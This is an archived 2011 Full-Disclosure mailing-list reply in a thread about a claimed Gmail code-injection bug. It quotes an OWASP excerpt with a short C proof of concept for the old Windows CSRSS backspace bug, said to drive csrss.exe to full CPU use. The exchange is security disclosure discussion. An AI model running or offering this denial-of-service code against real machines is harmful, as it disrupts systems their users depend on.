[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <BANLkTi=fjp2C3x6v2bSJ5SLfOs6ahHRL3A@mail.gmail.com>
Date: Sun, 12 Jun 2011 03:29:02 +0200
From: Christian Sciberras <uuf6429@...il.com>
To: noloader@...il.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: POC for a simple gmail/possible code
injection into html wich can be executed in an email,
i will make the PoC code and explain how here and now...
For those lazy enough to search:
https://www.owasp.org/index.php/The_CSRSS_Backspace_Bug_still_works_in_windows_2003_sp1
Excerpt:
Basicaly just compile this and you will get a 100% processor usage by the
compiled exploit and Csrss.exe
#include <stdio.h>
int main(void)
{
while(1)
printf("\t\t\b\b\b\b\b\b");
return 0;
}
How this helps in sending spam is beyond me.
On Sun, Jun 12, 2011 at 3:18 AM, Jeffrey Walton <noloader@...il.com> wrote:
> On Sat, Jun 11, 2011 at 9:06 PM, -= Glowing Doom =- <secn3t@...il.com>
> wrote:
>
> > It is now, over 1yr old atleast and exists in riched20.dll.
> > This PoC info is over for me also.
> Microsoft had problems with a backspace in the past. Search for "CSRSS
> Backspace Bug".
>
> > [SNIP
>
> Jeff
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists